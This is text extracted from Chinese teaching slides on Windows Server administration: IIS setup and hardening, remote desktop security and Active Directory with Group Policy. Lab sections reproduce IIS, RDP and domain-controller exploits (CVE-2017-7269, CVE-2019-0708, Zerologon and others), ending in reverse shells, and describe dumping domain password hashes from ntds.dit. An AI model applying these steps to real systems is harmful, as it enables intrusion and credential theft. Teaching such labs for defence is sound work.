版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
服务器配置与安全管理延迟符04
Windows服务器网站管理本任务是WindowsIIS服务的搭建,为了完成本任务,首先学习Windows互联网信息服务(IIS)的基础知识,其次在Windows2019上安装IIS服务器,最后对IIS服务器进行访问测试。Windows服务器网站管理搭建WindowsIIS服务WindowsIIS服务安全配置WindowsIIS服务渗透*延迟符本任务是WindowsIIS服务的搭建此处添加标题Addthistitle搭建WindowsIIS服务任务分析Taskanalysis必备知识Essentialknowledge任务实施Taskimplementation操作步骤Operationsteps首先学习Windows互联网信息服务(IIS)的基础知识,其次在Windows2019上安装IIS服务器,最后对IIS服务器进行访问测试。IIS的功能IIS版本在服务器管理器中添加"Web服务器(IIS)"设置“Web服务器(IIS)"相关参数测试IIS服务延迟符此处添加标题Addthistitle必备知识——
IIS的功能延迟符此处添加标题Addthistitle必备知识——
IIS版本延迟符IIS版本Windows版本备注IIS1.0WindowsNT3.51ServicePack3
IIS2.0WindowsNT4.0
IIS3.0WindowsNT4.0ServicePack3开始支持ASP的运行环境IIS4.0WindowsNT4.0OptionPack支持ASP3.0IIS5.0Windows2000在安装相关版本的NetFrameWork的RunTime之后,可支持ASP.NET1.0/1.1/2.0的运行环境IIS6.0WindowsServer2003WindowsVistaHomePremiumWindowsXPProfessionalx64Editions
IIS7.0WindowsVistaWindowsServer2008Windows7在系统中已经集成了NET3.5,可支持NET3.5及以下的版本IIS8.0Windows2012
IIS10Windows2016/Windows2019
此处添加标题Addthistitle任务实施——服务器管理器中添加"Web服务器(IIS)"延迟符进入服务器管理器,开启【服务器管理器】,点击“添加角色和功能”此处添加标题Addthistitle任务实施——服务器管理器中添加"Web服务器(IIS)"延迟符点击左边“安装类型”,然后单击“基于角色或基于功能的安装",再单击“下一步(N)"单击“从服务器池中选择服务器",再单击“本服务器的计算机名",这时只有本地IP,直接单击“下一步(N)"此处添加标题Addthistitle任务实施——服务器管理器中添加"Web服务器(IIS)"延迟符这时角色列表内找到“Web服务器(IIS)",单击勾选它此处添加标题Addthistitle任务实施——设置“Web服务器(IIS)"相关参数延迟符单击左边“功能”,中间勾选“.NetFramework3.5”单击左边“角色服务器",在中间角色服务列表中选择需要安装的项目此处添加标题Addthistitle任务实施——设置“Web服务器(IIS)"相关参数延迟符单击左边“确认”,勾选“如果需要,自动重启目标服务器”,此处添加标题Addthistitle任务实施——测试IIS服务延迟符客户机访问Windows2019Server的Web服务Windows服务器网站管理搭建WindowsIIS服务WindowsIIS服务安全配置WindowsIIS服务渗透*延迟符本任务是WindowsIIS服务的安全配置此处添加标题AddthistitleWindowsIIS服务安全配置任务分析Taskanalysis必备知识Essentialknowledge任务实施Taskimplementation操作步骤Operationsteps首先学习IIS安全的理论知识,其次在Windows2019上通过删除默认web站点,给新建站点设置权限增加系统的安全性,再次删除不使用的应用程序扩展,对Web服务的IP访问作限制,最后查看IIS日志信息并设置记录日志的字段。Web服务器IIS状态IIS日志删除和配置网站、对IIS用户进行权限管理
IIS扩展服务配置IIS日志配置延迟符此处添加标题Addthistitle必备知识——Web服务器延迟符Web服务器也称为WWW(WorldWideWeb)服务器,主要功能是提供网上信息浏览服务。WWW是Internet的多媒体信息查询工具,是Internet上近年才发展起来的服务,也是发展最快和目前用的最广泛的服务。正是因为有了WWW工具,才使得近年来Internet迅速发展,且用户数量飞速增长。Web服务器是可以向发出请求的浏览器提供文档的程序。此处添加标题Addthistitle必备知识——IIS状态延迟符
当用户试图通过HTTP或文件传输协议(FTP)访问一台正在运行Internet信息服务(IIS)的服务器上的内容时,IIS返回一个表示该请求的状态的数字代码。该状态代码记录在IIS日志中,同时也可能在Web浏览器或FTP客户端显示。状态代码可以指明具体请求是否已成功,还可以揭示请求失败的确切原因,如200表示成功,IIS已成功处理请求;304表示未修改,客户端请求的文档已在其缓存中,文档自缓存以来尚未被修改过;401.1表示登录失败,登录尝试不成功,可能因为用户名或密码无效等。此处添加标题Addthistitle必备知识——IIS日志延迟符IIS日志是每个服务器管理者都必须学会查看的,服务器的一些状况和访问IP的来源都会记录在IIS日志中此处添加标题Addthistitle任务实施——删除和配置网站、对IIS用户进行权限管理延迟符删除默认网站新建用户网站web服务器有多个IP时,只监听提供服务的IP地址,Web(右键)->编辑绑定,此处添加标题Addthistitle任务实施——删除和配置网站、对IIS用户进行权限管理延迟符创建IIS管理员,打开本地服务器管理,双击“IIS管理器用户”单击右侧菜单栏中的“添加用户”,输入用户账号和密码,点击“确认”,此处添加标题Addthistitle任务实施——删除和配置网站、对IIS用户进行权限管理延迟符设置管理员权限,打开本地服务器管理,双击“功能委派”此处添加标题Addthistitle任务实施——扩展服务配置延迟符删除不使用的应用程序扩展此处添加标题Addthistitle任务实施——I扩展服务配置延迟符设置IP访问限制此处添加标题Addthistitle任务实施——I扩展服务配置延迟符设置IP访问限制此处添加标题Addthistitle任务实施——I扩展服务配置延迟符自定义IIS返回的错误信息此处添加标题Addthistitle任务实施——I扩展服务配置延迟符通过在网站功能视图中查看日志文件,了解web服务器的访问状况此处添加标题Addthistitle任务实施——IIS日志配置延迟符通过在网站功能视图中查看日志文件,了解web服务器的访问状况此处添加标题Addthistitle任务实施——IIS日志配置延迟符通过在网站功能视图中查看日志文件,了解web服务器的访问状况Windows服务器网站管理搭建WindowsIIS服务WindowsIIS服务安全配置WindowsIIS服务渗透*延迟符本任务是WindowsIIS服务的安全配置此处添加标题AddthistitleWindowsIIS服务渗透*任务分析Taskanalysis必备知识Essentialknowledge任务实施Taskimplementation操作步骤Operationsteps本任务是本项目的拓展内容,首先讲述了WindowsIIS服务器存在的安全隐患,其次介绍了两个常见的IIS漏洞:CVE-2017-7269和CVE-2022-21907漏洞,展示如何利用这两个漏洞获取系统管理员权限,最后介绍了如何对IIS服务进行安全加固。IIS的安全脆弱性CVE-2017-7269漏洞介绍CVE-2022-21907漏洞介绍WebDavCVE-2017-7269漏洞复现WindowsCVE-2022-21907漏洞复现延迟符此处添加标题Addthistitle必备知识——IIS的安全脆弱性延迟符IIS的安全脆弱性曾长时间被业内诟病,一旦IIS出现远程执行漏洞威胁将会非常严重。远程执行代码漏洞存在于HTTP协议堆栈(HTTP.sys)中,当HTTP.sys未正确分析经特殊设计的HTTP请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统账户的上下文中执行任意代码,可以导致IIS服务器所在机器蓝屏或读取其内存中的机密数据。此处添加标题Addthistitle必备知识——CVE-2017-7269漏洞介绍延迟符MicrosoftWindowsServer2003R2是美国微软(Microsoft)公司发布的一套服务器操作系统。InternetInformationServices(IIS)是一套运行于MicrosoftWindows中的互联网基本服务。
在WindowsServer2003的IIS6.0的WebDAV服务的ScStoragePathFromUrl函数存在缓存区溢出漏洞,攻击者可通过一个以“If:<http://”开始的较长header头的PROPFIND请求执行任意代码。
目前针对WindowsServer2003R2可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。影响范围MicrosoftWindowsServer2003R2开启WebDAV服务的IIS6.0此处添加标题Addthistitle必备知识——CVE-2022-21907漏洞介绍延迟符
由于HTTP协议栈(HTTP.sys)中的HTTPTrailerSupport功能存在边界错误可导致缓冲区溢出。未经身份认证的攻击者可通过向目标Web服务器发送特制的HTTP请求来处理数据包,利用此漏洞,从而在目标系统上执行任意代码。利用此漏洞不需要身份认证和用户交互,微软官方将其标记为蠕虫漏洞,并建议优先修补受此漏洞影响的服务器。默认情况下,WindowsServer2019和Windows10版本1809不易受到攻击。除非用户已通过EnableTrailerSupport注册表值启用HTTPTrailerSupport,否则系统不会受到攻击。影响范围此处添加标题Addthistitle任务实施——
WebDavCVE-2017-7269漏洞复现延迟符在Kali上使用NC开启监听运行漏洞利用脚本此处添加标题Addthistitle任务实施——
WebDavCVE-2017-7269漏洞复现漏洞复现延迟符成功返回shell,漏洞利用成功此处添加标题Addthistitle任务实施——
WindowsCVE-2022-21907漏洞复现漏洞复现延迟符运行检测脚本对靶机进行探测此处添加标题Addthistitle任务实施——
WindowsCVE-2022-21907漏洞复现漏洞复现延迟符成功返回shell,漏洞利用成功此处添加标题Addthistitle项目总结——Windows服务器网站管理延迟符
本项目主要介绍了WindowsIIS服务器搭建、WindowsIIS服务的安全配置、查看IIS日志等,在项目实施中注重以问题为导向,在实践中学习的方法,将团结协作、严谨求实等思政元素融入教学中。CONTENTS目录z走进Windows服务器01
Windows服务器用户管理02Windows服务器共享管理03Windows服务器网站管理04延迟符z06070805Windows服务器远程管理Windows域管理Windows应用安全Windows内网安全05Windows服务器远程管理工作中比较常用的是开启Windows自带的远程管理功能,这就必须开启一个不安全的端口3389。本项目讲解了如何安全开启远程连接,以及通过更改远程连接端口来达到安全防护的目的。延迟符Windows服务器远程管理Windows服务器远程访问的实现Windows远程访问的安全配置Windows远程访问服务的渗透*延迟符本任务是Windows服务器远程访问的实现此处添加标题AddthistitleWindows服务器远程访问的实现任务分析Taskanalysis必备知识Essentialknowledge任务实施Taskimplementation操作步骤Operationsteps本任务是Windows服务器远程访问的实现,为了完成本任务,首先学习远程连接的理论知识,其次以WindowsServer2019远程桌面为例,学习远程桌面连接的配置流程,最后对远程访问访问进行测试。Windows远程桌面服务第三方远程桌面服务设置远程访问用户开启“远程桌面”功能设置账号权限延迟符此处添加标题Addthistitle必备知识——Windows远程桌面服务延迟符Windows远程桌面连接是一种远程操作电脑的模式,它可以用于可视化访问远程计算机的桌面环境,用于管理员在客户机上对远程计算机服务器进行管理等场合。
此处添加标题Addthistitle必备知识——第三方远程桌面服务延迟符(1)TeamViewerTeamViewer是一个非常受欢迎的产品,除了Windows远程桌面之外,它可能是周围使用最广泛的远程桌面软件,它具有很强的灵活性,仅需要运行一次,便可以长期使用远程功能,或者可以使用高级安全规则对其进行设置,在无人值守的情况下使用。TeamViewer支持的系统非常多,可以在Windows、MacOS、Linux和ChromeOS上安装TeamViewer应用程序。此外,还有适用于Android,IOS,WindowsPhone和BlackBerry等移动客户端应用程序。(2)Chrome远程桌面Chrome远程桌面是这几年Google为其ChromeWeb浏览器推出了远程桌面解决方案。Chrome远程桌面设置起来非常容易,而且完全免费,不过Chrome远程桌面仅能满足基本的远程需求,像文件传输和远程打印这样的高级功能是不支持的。但因为操作起来足够简单,也受到了很多用户的喜欢。(3)VNCVNC是一个开源的远程桌面解决方案,由于VNC是开源的,并且该协议免费提供给任何人使用,因此很容易找到优秀的VNC客户端应用程序此处添加标题Addthistitle任务实施——设置远程访问用户延迟符在WindowsServer2019中“控制面板”中单击“用户账户”此处添加标题Addthistitle任务实施——设置远程访问用户延迟符在“管理其他账户”中添加用户ftp1,此处添加标题Addthistitle任务实施——开启“远程桌面”功能延迟符在WindowsServer2019中“控制面板”中单击“系统和安全”,单击“系统”,此处添加标题Addthistitle任务实施——开启“远程桌面”功能延迟符在“系统”中,单击“远程设置”
,在“远程桌面连接”中单击“允许远程连接到此电脑”,单击“确定”,此处添加标题Addthistitle任务实施——开启“远程桌面”功能延迟符在“系统”中,单击“远程设置”
,在“远程桌面连接”中单击“允许远程连接到此电脑”,单击“确定”,此处添加标题Addthistitle任务实施——设置账号权限延迟符在“服务器管理”中单击“本地安全策略”,在“本地安全策略”用户权限分配中“允许通过远程桌面服务登录”中添加ftp1用户此处添加标题Addthistitle任务实施——远程连接测试延迟符在物理机客户端输入“mstsc”,在弹出的对话框中输入WindowsServer2019的IP地址,用户名、密码登录桌面此处添加标题Addthistitle任务实施——远程连接测试延迟符在物理机客户端输入“mstsc”,在弹出的对话框中输入WindowsServer2019的IP地址,用户名、密码登录桌面Windows远程访问的安全配置Windows服务器远程访问的实现Windows远程访问的安全配置Windows远程访问服务的渗透*延迟符本任务是修改远程访问服务端口,提升网络访问的安全性。此处添加标题AddthistitleWindows服务器远程访问的实现任务分析Taskanalysis必备知识Essentialknowledge任务实施Taskimplementation操作步骤Operationsteps首先学习远程桌面连接的默认端口,其次学习通过注册表修改远程访问的端口号的方法,最后通过设置Windows防火墙使得修改过后的端口能被访问。Windows远程桌面修改远程访问服务端口防火墙限制远程访问延迟符此处添加标题Addthistitle必备知识——Windows远程桌面延迟符
远程桌面是网络管理员最常用的工具之一,尤其是外网访问时非常方便,但是其默认的3389端口容易受到攻击,例如:一个客户的服务器就曾因为没有更改默认端口而遭到勒索病毒的攻击,幸亏提前在其它设备做了备份,只是重装服务器损失了一些时间。所以更改远程桌面的默认端口是一项常规却相对有效的手段。此处添加标题Addthistitle任务实施——修改远程访问服务端口延迟符
在“开始->运行”菜单里输入“regedit”,进入注册表编辑在注册表中打开如下路径此处添加标题Addthistitle任务实施——修改远程访问服务端口延迟符
找到右侧的“PortNumber",用十进制方式显示,默认为3389,改为5261端口此处添加标题Addthistitle任务实施——修改远程访问服务端口延迟符
在注册表中打开如下路径:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp,此处添加标题Addthistitle任务实施——修改远程访问服务端口延迟符
找到右侧的“PortNumber",用十进制方式显示,默认为3389,改为同上的端口此处添加标题Addthistitle任务实施——修改远程访问服务端口延迟符
找到右侧的“PortNumber",用十进制方式显示,默认为3389,改为同上的端口此处添加标题Addthistitle任务实施——防火墙限制远程访问延迟符
控制面板->Windows防火墙->高级设置->入站规则->新建规则此处添加标题Addthistitle任务实施——防火墙限制远程访问延迟符
控制面板->Windows防火墙->高级设置->入站规则->新建规则此处添加标题Addthistitle任务实施——防火墙限制远程访问延迟符
选择端口->协议和端口->TCP/特定本地端口,输入5261,此处添加标题Addthistitle任务实施——防火墙限制远程访问延迟符
选择允许连接,下一步,选择公用此处添加标题Addthistitle任务实施——防火墙限制远程访问延迟符
名称:远程桌面-新(TCP-In),描述:用于远程桌面服务的入站规则,以允许RDP通信删除原有的远程桌面(TCP-In)规则Windows远程访问的安全配置Windows服务器远程访问的实现Windows远程访问的安全配置Windows远程访问服务的渗透*延迟符本任务是本项目的拓展内容,本任务首先介绍如何利用工具对域内的相关信息进行搜集,再次介绍如何从域控制器上导出所有域用户密码,最后讲述如何利用CVE-2021-42287和CVE-2022-1472漏洞对域环境进行渗透测试。此处添加标题AddthistitleWindows远程访问服务的渗透*任务分析Taskanalysis必备知识Essentialknowledge任务实施Taskimplementation操作步骤Operationsteps本任务是本项目的拓展内容,为了完成本任务,首先学习MS12-020、CVE-2019-0708远程访问漏洞的理论知识,其次利用这两个漏洞对服务器进行渗透测试。MS12-020漏洞介绍CVE-2019-0708漏洞介绍MS12-020漏洞复现CVE-2019-0708漏洞复现延迟符此处添加标题Addthistitle必备知识——MS12-020漏洞介绍延迟符
MS12-020漏洞的定义是指操作系统的远程桌面协议存在重大漏洞,入侵者(黑客)可以通过向远程桌面默认端口(3389)发一系列特定RDP包,从而获取超级管理员权限,进而入侵系统。根据实际被入侵终端进行分析,开放远程桌面服务并使用默认的3389端口的会成为攻击目标。根据微软的安全公告,Windows全系列操作系统(WinXP/Vista/Win7/Win2000/Win2003/Win2008)均存在受控威胁。此处添加标题Addthistitle必备知识——CVE-2019-0708漏洞介绍延迟符
2019年5月14日,微软发布了针对远程桌面服务的关键远程执行代码漏洞CVE-2019-0708的补丁,该漏洞影响某些旧版本的Windows。攻击者一旦成功触发该漏洞,便可以在目标系统上执行任意代码,该漏洞的触发无需任何用户交互操作。这意味着,存在漏洞的计算机只要联网,无需任何操作,就可能遭遇黑客远程攻击,运行恶意代码。其方式与2017年的WannaCry恶意软件的传播方式类似.成功利用此漏洞的攻击者可以在目标系统完成安装应用程序,查看、更改或删除数据,创建完全访问权限的新账户等操作。此处添加标题Addthistitle任务实施——
MS12-020漏洞复现延迟符
实验环境靶机:WindowsServer2008R2攻击机:KaliLinux实验步骤开启靶机的远程服务此处添加标题Addthistitle任务实施——MS12-020漏洞复现延迟符
打开KaliLinux中msf工具,使用ms12-020扫描模块扫描靶机系统,发现靶机系统存在漏洞使用攻击模块对其进行渗透测试此处添加标题Addthistitle任务实施——MS12-020漏洞复现延迟符
靶机蓝屏,漏洞利用成功此处添加标题Addthistitle任务实施——CVE-2019-0708漏洞复现延迟符
实验环境靶机:WindowsServer2008R2攻击机:KaliLinux实验步骤同上一案例开启靶机的远程服务,在KaliLinux中运行脚本,对靶机进行渗透测试靶机出现蓝屏,成功验证漏洞,此处添加标题Addthistitle项目总结——
Windows服务器远程管理延迟符
二十大报告中强调了“职业学校学生要注重实践能力的培养”,本项目主要讲述了Windows2019设置远程连接的方法,修改远程访问默认端口提高系统的安全性的方法以及常见的远程连接漏洞。CONTENTS目录z走进Windows服务器01
Windows服务器用户管理02Windows服务器共享管理03Windows服务器网站管理04延迟符z06070805Windows服务器远程管理Windows域管理Windows应用安全Windows内网安全06Windows域管理域是Windows网络中独立运行的单位,也是Windows网络操作系统的逻辑组织单元,它的安全管理在网络服务中至关重要,本项目有三个任务:域的搭建、域的管理,渗透域,通过本项目的学习提升学生对Windows域安全管理的能力。延迟符Windows域管理搭建域环境使用组策略管理域环境渗透Windows域*延迟符通过建立一个Windows域并使一台主机加入这个域,为后面学习域的安全设置做准备。此处添加标题Addthistitle搭建域环境任务分析Taskanalysis必备知识Essentialknowledge任务实施Taskimplementation操作步骤Operationsteps通过建立一个Windows域并使一台主机加入这个域,为后面学习域的安全设置做准备。域的定义和作用域的部署域控制器的设置将计算机加入到域延迟符此处添加标题Addthistitle必备知识——域的定义和作用延迟符
“域”是一个相对严格的组织。“域”指的是服务器控制网络上的计算机能否加入的计算机组合。
在“域”模式下,至少有一台服务器负责每一台联入网络的电脑和用户的验证工作,相当于一个单位的门卫一样,称为“域控制器(DomainController,简写为DC)”。“域控制器”中包含了由这个域的账户、密码、属于这个域的计算机等信息构成的数据库。当电脑联入网络时,域控制器首先要鉴别这台电脑是否是属于这个域的,用户使用的登录账号是否存在、密码是否正确。如果以上信息不正确,域控制器就拒绝这个用户从这台电脑登录。不能登录,用户就不能访问服务器上有权限保护的资源,只能以对等网用户的方式访问Windows共享出来的资源,这样就一定程度上保护了网络上的资源。
一般情况下,域控制器集成了DNS服务,可以解析域内的计算机名称(基于TCP/IP),解决了工作组环境不同网段计算机不能使用计算机名互访的问题。此处添加标题Addthistitle必备知识——域的部署延迟符
部署准备:(1)安装者必须具有本地管理员的权限。(2)操作系统版本必须满足条件(WindowsServer2003除Web以外的所有都满足)。(3)本地磁盘必须有一个NTFS文件系统。(4)有TCP/IP设置。(5)有相应的DNS服务器支持。(6)有足够的可用空间。安装活动目录(AD)步骤:(1)打开AD:开始--运行输入dcpromo。(2)是否创建新域。DC有两种新域的域控和现有域的额外域控制器。一般选择新域的域控。(3)输入新域的DNS全名。(4)输入新域的NetBIOS名(5)数据库和日志文件夹。为了优化性能,可以将数据库和日志放在不同的硬盘上。该文件夹不一定在NTFS分区。如果本计算机是域的第一台域控,则sam数据库就会升级到C:\Windows\ntds\ntds.dit,本地用户账户变成域用户账户。(6)共享的系统卷。共享系统卷SYSVOL文件夹存放的位置必须是NTFS文件系统。(7)DNS注册诊断。AD需要DNS服务支持。(8)域兼容性。如果网络中不存在WindowsServer2003以前版本的域控制器,就选第二项。如果存在选第一项。(9)还原模式密码。目录服务还原模式的管理员密码,是在目录服务还原模式下登录系统时使用。由于目录服务还原模式下,所有的域账户用户都不能使用,只有使用这个还原模式管理员账户登录。(10)安装完成后需重启计算机。此处添加标题Addthistitle任务实施——域控制器的设置延迟符
打开“服务器管理器”,点击“添加功能和角色”进入“添加角色和功能向导”,检查到静态IP地址已配置完成,管理员账户使用的是强密码和最新的安全更新在实验中可以忽略此处添加标题Addthistitle任务实施——域控制器的设置延迟符
选择第一项“基于角色或基于功能的安装”服务器选择服务器池中的本地服务器此处添加标题Addthistitle任务实施——域控制器的设置延迟符
服务器角色中确保已安装了“DNS服务器”,如果没有安装将“DNS服务器”勾选上。然后勾选上“ActiveDirectory域服务”,同时也在该服务器上安装域服务管理工具此处添加标题Addthistitle任务实施——域控制器的设置延迟符
在WindowsServer2019上ActiveDirectory域服务的安装不需要添加额外的功能,直接点击“下一步”确认选择无误,点击“安装”按钮开始安装此处添加标题Addthistitle任务实施——域控制器的设置延迟符
“ActiveDirectory域服务”安装完成之后,点击“将此服务器提升为域控制器”。如果不慎点了“结束”按钮关闭了向导,也可以在“服务器管理器”中找到此处添加标题Addthistitle任务实施——域控制器的设置延迟符
进入“ActiveDirectory域服务配置向导”,部署操作选择“添加新林”并输入根域名,必须使用允许的DNS域命名约定创建新林,“域控制器选项”页将显示以下选项。默认情况下,林和域功能级别设置为WindowsServer2019此处添加标题Addthistitle任务实施——域控制器的设置延迟符
安装DNS服务器时,应该在父域名系统(DNS)区域中创建指向DNS服务器且具有区域权限的委派记录。此处添加标题Addthistitle任务实施——域控制器的设置延迟符
确保为域分配了NetBIOS名称“路径”页可以用于覆盖ADDS数据库、数据库事务日志和SYSVOL共享的默认文件夹位置。默认位置始终位于%systemroot%中,保持默认即可此处添加标题Addthistitle任务实施——域控制器的设置延迟符
“审查”选项页可以用于验证设置并确保在开始安装前满足要求。这不是停止使用服务器管理器安装的最后一次机会。此处添加标题Addthistitle任务实施——域控制器的设置延迟符
“审查”选项页可以用于验证设置并确保在开始安装前满足要求。这不是停止使用服务器管理器安装的最后一次机会。此处添加标题Addthistitle任务实施——域控制器的设置延迟符
安装完毕之后系统会自动重启,重启之后将以域管理员的身份登录,到此,域控制器配置完毕此处添加标题Addthistitle任务实施——将计算机加入到域延迟符
更改DNS地址为域控制器的地址控制面板,选择“系统和安全->系统->更改设置”此处添加标题Addthistitle任务实施——将计算机加入到域延迟符
在弹出的计算机属性对话框中点击“更改”选择“域”,输入创建的域名称“”此处添加标题Addthistitle任务实施——将计算机加入到域延迟符
如果DNS设置成功,会提示输入密码对话框,这时需要输入一位已经在域中的用户的用户名和密码,并不一定是管理员。当输入的用户名和密码验证通过后就可以成功加入到域中搭建域环境使用组策略管理域环境渗透Windows域*延迟符本任务是组策略的使用,为了完成本任务,首先学习组策略的理论知识,其次在域中建立组策略对象GPO,最后手动更新组策略,使域用户在登录域时能显示域控部署的软件。Windows域管理此处添加标题Addthistitle使用组策略管理域环境任务分析Taskanalysis必备知识Essentialknowledge任务实施Taskimplementation操作步骤Operationsteps本任务是组策略的使用,为了完成本任务,首先学习组策略的理论知识,其次在域中建立组策略对象GPO,最后手动更新组策略,使域用户在登录域时能显示域控部署的软件。组策略的定义和作用组策略处理顺序新建GPO编辑GPO在容器对象上链接GPO手动更新组策略延迟符此处添加标题Addthistitle必备知识——组策略的定义和作用延迟符
组策略(英语:GroupPolicy)是微软WindowsNT家族操作系统的一个特性,它可以控制用户账户和计算机账户的工作环境。组策略提供了操作系统、应用程序和活动目录中用户设置的集中化管理和配置。组策略的其中一个版本名为本地组策略(缩写“LGPO”或“LocalGPO”),这可以在独立且非域的计算机上管理组策略对象。组策略在部分意义上是控制用户可以或不能在计算机上做什么,例如:施行密码复杂性策略避免用户选择过于简单的密码,允许或阻止身份不明的用户从远程计算机连接到网络共享,阻止访问Windows任务管理器或限制访问特定文件夹。这样一套配置被称为组策略对象(GroupPolicyObject,GPO)。此处添加标题Addthistitle必备知识——组策略处理顺序延迟符
本地——任何在本地计算机的设置。在WindowsVista之前,每台计算机只能有一份本地组策略。在WindowsVista和之后的Windows版本中,允许每个用户账户分别拥有组策略。站点——任何与计算机所在的活动目录站点关联的组策略。(活动目录站点是旨在管理促进物理上接近的计算机的一种逻辑分组)。如果多个策略已链接到一个站点,将按照管理员设置的顺序处理。域——任何与计算机所在Windows域关联的组策略。如果多个策略已链接到一个域,将按照管理员设置的顺序处理。组织单元——任何与计算机或用户所在的活动目录组织单元(OU)关联的组策略。(OU是帮助组织和管理一组用户、计算机或其他活动目录对象的逻辑单元)。如果多个策略已链接到一个OU,将按照管理员设置的顺序处理。组策略设置内部是一个分层结构,父传子、子传孙,以此类推,这被称为“继承”。它可以控制阻止或施行策略应用到每个层级。如果高级别的管理员创建了一个具有继承性的策略,而低层级的管理员策略与此相悖,此策略仍将生效。在组策略偏好设置已配置并且同等的组策略设置已配置时,组策略设置将会优先。WMI过滤是组策略通过Windows管理规范(WMI)过滤器来选择应用范围的一个流程。过滤器允许管理员只应用组策略到特定情况,例如特定型号、内存、已安装软件或任何WMI可查询条件的特定情况的计算机。通过在计算机上建立组策略对象(GPO),对GPO进行编辑、链接、更新等操作,提高计算机系统的安全性此处添加标题Addthistitle任务实施——新建GPO延迟符
在【服务器管理器】中,依单击【工具】→【组策略管理】菜单项。出现【组策略管理】窗口,在导航窗格中展开域【】,选择【组策略对象】节点,右键单击,从弹出菜单中选择【新建】菜单项。此处添加标题Addthistitle任务实施——编辑GPO延迟符
在【组策略管理】窗口的导航窗格中展开域【】,选择【组策略对象】节点,在详细窗格的【内容】选项卡中,右键单击“helpdesk”GPO,在弹出菜单中单击【编辑】菜单项。出现【组策略对象编辑器】窗口,在导航窗格下依次展开【计算机配置】→【策略】→【Windows设置】→【安全设置】节点,右键单击【受限制的组】,从弹出菜单中选择【添加组】菜单项。此处添加标题Addthistitle任务实施——编辑GPO延迟符
出现【helpdesks属性】对话框,单击【这个组隶属于】选项旁的的按钮。出现【组成员身份】对话框,在【组名】文本框输入“Administrators”,单击按钮。返回【helpdesks属性】对话框此处添加标题Addthistitle任务实施——手动更新组策略延迟符
在WindowsServer2019上创建一个文件夹“C:\softwares”,并将安装包googlechrom.msi存放到该文件夹内。将“C:\softwares”设置为共享文件夹,作为软件发布点,共享权限设置everyone只有读取权限,NTFS权限使用默认值(系统自动了赋予everyone读取权限)。此处添加标题Addthistitle任务实施——在容器对象上链接GPO延迟符
在【组策略管理】窗口的导航窗格中,右键单击域【】,从弹出菜单中选择【链接现有GPO】菜单项。出现【选择GPO】对话框,在【组策略对象】列表框中选择组策略对象“helpdesk”,单击按钮。此处添加标题Addthistitle任务实施——在容器对象上链接GPO延迟符
出现【部署软件】对话框,选中【已分配】单选按钮返回【组策略对象编辑器】窗口,可以看到软件已经分配成功,手动应用组策略更新。此处添加标题Addthistitle任务实施——在容器对象上链接GPO延迟符
由于该GPO已经链接到域,直接在命令窗口执行命令“gpupdate/force”,刷新组策略,重启客户机Windows10,以域用户账户登录,验证软件分配。登录后屏幕显示结果搭建域环境使用组策略管理域环境渗透Windows域*延迟符本任务是本项目的拓展内容,本任务首先介绍如何利用工具对域内的相关信息进行搜集,再次介绍如何从域控制器上导出所有域用户密码,最后讲述如何利用CVE-2021-42287和CVE-2022-1472漏洞对域环境进行渗透测试Windows域管理此处添加标题Addthistitle渗透Windows域*任务分析Taskanalysis必备知识Essentialknowledge任务实施Taskimplementation操作步骤Operationsteps本任务是本项目的拓展内容,本任务首先介绍如何利用工具对域内的相关信息进行搜集,再次介绍如何从域控制器上导出所有域用户密码,最后讲述如何利用CVE-2021-42287和CVE-2022-1472漏洞对域环境进行渗透测试。域渗透基本概念CVE-2021-42287漏洞介绍CVE-2020-1472漏洞介绍
域信息收集导出域用户密码
CVE-2021-42287域控漏洞复现CVE-2020-1472NetLogon权限提升漏洞延迟符此处添加标题Addthistitle必备知识——域渗透基本概念延迟符
域是Windows下的一种统一化管理的方式,一个电脑可以用多个账号登录,有本地用户和域用户两种方式登录,没有域环境和有域环境的认证方式不同,Windows终端的管理,往往会分为:单独的主机,工作组,域环境,三种环境下认证方式均有不同此处添加标题Addthistitle必备知识——CVE-2021-42287漏洞介绍延迟符
CVE-2021-42287,机器账户的名字一般来说应该以$结尾,但AD(活动目录)没有对域内机器账户名做验证。此处添加标题Addthistitle必备知识——CVE-2020-1472漏洞介绍延迟符
域控Netlogon特权提升漏洞(CVE-2020-1472),攻击者可使用Netlogon远程协议(MS-NRPC)建立与域控制器的连接,连接的安全通道存在特权提升的漏洞。此处添加标题Addthistitle任务实施——域信息收集延迟符
查看当前权限查看管理员组查询指定用户详细信息此处添加标题Addthistitle任务实施——域信息收集延迟符
查看当前登录域及登录用户的信息查询域内所有用户组列表此处添加标题Addthistitle任务实施——域信息收集延迟符
查询所有域内成员计算机列表获取域密码信息查看域控制器组查询域管理员用户此处添加标题Addthistitle任务实施——导出域用户密码延迟符
域用户hash导出原理创建快照加载快照此处添加标题Addthistitle任务实施——导出域用户密码延迟符
拷贝快照中的ntds.dit和system文件卸载快照删除快照此处添加标题Addthistitle任务实施——导出域用户密码延迟符
使用NTDSDumpEx.exe工具导出域用户密码
打开域用户密码文件此处添加标题Addthistitle任务实施——CVE-2021-42287域控漏洞复现延迟符
/Ascotbe/Kernelhub/tree/master/Windows/CVE-2021-42287域控制器为WIN-8JLDISG6LK7,查看域管理员账户并执行漏洞利用程序此处添加标题Addthistitle任务实施——CVE-2021-42287域控漏洞复现延迟符
此时域内普通用户拥有了管理员用户的权限,输入“klist”,查看票据,输入“dir\\dc\c$”,获取C盘文件此处添加标题Addthistitle任务实施——CVE-2020-1472NetLogon权限提升漏洞延迟符
漏洞利用脚本下载地址:/VoidSec/CVE-2020-1472利用漏洞脚本将域控的机器账号密码置空此处添加标题Addthistitle任务实施——CVE-2020-1472NetLogon权限提升漏洞延迟符
利用机器用户及空密码获取域控administrator用户的hash此处添加标题Addthistitle项目总结——
Windows域管理延迟符
本项目主要介绍了Windows域环境的搭建、使用组策略以及如何利用漏洞渗透Windows域。在项目实施中注重团队合作精神的培养,培养学生数据保护的意识。CONTENTS目录z走进Windows服务器01
